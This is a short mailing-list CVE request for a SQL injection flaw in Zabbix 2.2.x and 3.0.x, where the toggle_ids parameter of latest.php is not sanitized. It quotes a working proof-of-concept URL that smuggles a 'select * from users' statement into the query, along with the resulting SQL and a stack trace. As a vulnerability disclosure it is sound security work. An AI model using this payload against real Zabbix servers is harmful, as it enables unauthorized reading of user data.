CVE Request: Zabbix: SQL injection vulnerabilities in "Latest data"

[Salvatore Bonaccorso <carnil () debian org>]

Hi

> From [1].
> Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection
> vulnerability due to a failure to sanitize input in the toggle_ids
> array in the latest.php page.
>
> For example:
> latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
>
> Result
>
> SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 
> 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
> latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in 
> /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185


 [1] https://support.zabbix.com/browse/ZBX-11023
 [2] https://bugs.debian.org/850936

Could you please assign a CVE for this zabbix issue.

Regards,
Salvatore